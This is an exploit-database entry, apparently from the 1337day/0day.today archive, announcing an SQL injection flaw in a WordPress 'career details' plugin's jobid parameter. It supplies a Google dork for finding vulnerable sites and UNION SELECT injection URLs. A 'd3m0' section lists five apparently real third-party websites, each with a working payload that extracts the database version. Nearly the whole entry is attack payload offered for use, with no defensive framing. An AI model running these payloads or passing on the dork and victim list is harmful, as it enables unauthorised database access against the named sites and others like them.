id: 21172
date: 08/28/2013
title: Wordpress career details Sql Injection Vulnerability
author: Angel Injection
cves: 

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Angel Injection member from Inj3ct0r Team          1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Wordpress career details Sql Injection 
[-] Found by Angel Injection
[-] Version: all version
[-] Security -::RISK: high
[-] platforms: php
[-] Dork: inurl:/career-details/?jobid=
[-] About 578 results (0.36 seconds) And More ...

3xpl01t

http://target.com/[path]/career-details/?jobid=1 [sql injection here]

http://target.com/career-details/?jobid=-118+union+select+1,2,3,4--


d3m0

http://www.tsata.com/career-details/?jobid=-1+union+select+1,version(),3,4--

http://mainsailhotels.com/career-details-2/?jobid=-1+union+select+1,version(),3,4--

http://npparecruiters.com/career-details/?jobid=-1+union+select+1,version(),3,4--

https://www.1834me.com/career-details/?jobid=-1+union+select+1,version(),3,4--

http://www.alshamaligroup.com/career-details-2/?jobid=-1+union+select+1,version(),3,4--

#  0day.today [2023-03-24]  #